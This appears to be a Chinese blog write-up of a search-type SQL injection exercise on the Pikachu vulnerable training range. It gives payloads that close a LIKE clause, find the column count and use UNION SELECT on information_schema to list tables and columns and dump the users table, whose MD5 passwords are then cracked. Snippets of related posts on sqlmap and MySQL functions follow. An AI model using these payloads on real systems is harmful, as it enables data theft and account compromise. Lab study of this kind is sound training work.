Pikachu搜尋型注入

2021-10-09 00:27:29 字數 1358 閱讀 1725

pikachu搜尋型注入

一樣先看一下正確的顯示

輸入ko 會自動搜尋包含 ko的字段顯示出來

因為會自動匹配到username,所以可以聯想到這段語句使用了mysql的模糊查詢。

條件大致為:where username like 』%ko%『;

一樣嘗試閉合然後再注釋看是否能正常返回

回顯正常,接下來應該就可以按照平常的注入就行了

一樣的判斷列數

ko%』 order by 4 # --報錯

ko%』 order by 3 # --正常

聯合查詢檢視注入點

接下來一樣的先爆庫

爆表ko%』 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() #

爆欄位ko%』 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=「users」#

爆表中的字段內容

md5解密密碼就可以得到使用者名稱密碼

SQL注入 搜尋型注入

語句如下 select from database.table where users like 要查詢的關鍵字 這裡 匹配任何字元,like 的意思就是像。比如我們在搜尋框輸入關鍵字 李 那麼sql語句就變成了select from database.table where users like ...

mysql搜尋型注入

摘要 先來說一點基礎的東西。php中和mysql 的一點基本的知識。大鳥飛過了 left 從左向右擷取 length 函式是計算括號中資料的長度,回顯為純數字,可以用大於小於和等於號來判斷是否正確 substr 要擷取的字串,開始位置 擷取長度 mid 列名,n,1 來擷取列名的第n位字元 ord ...

sqlmap注入引數(常用)pikachu靶場

對於有sql注入的引數,可以採用sqlmap進行批量測試,常用命令如下 使用sqlmap跑post方式時的格式 python2 sqlmap.py u data dbms 預設情況下會探測web應用後端的資料庫是什麼 該步驟 dbms mysql 制定了資料庫型別為myslq資料庫 dbs 當使用者...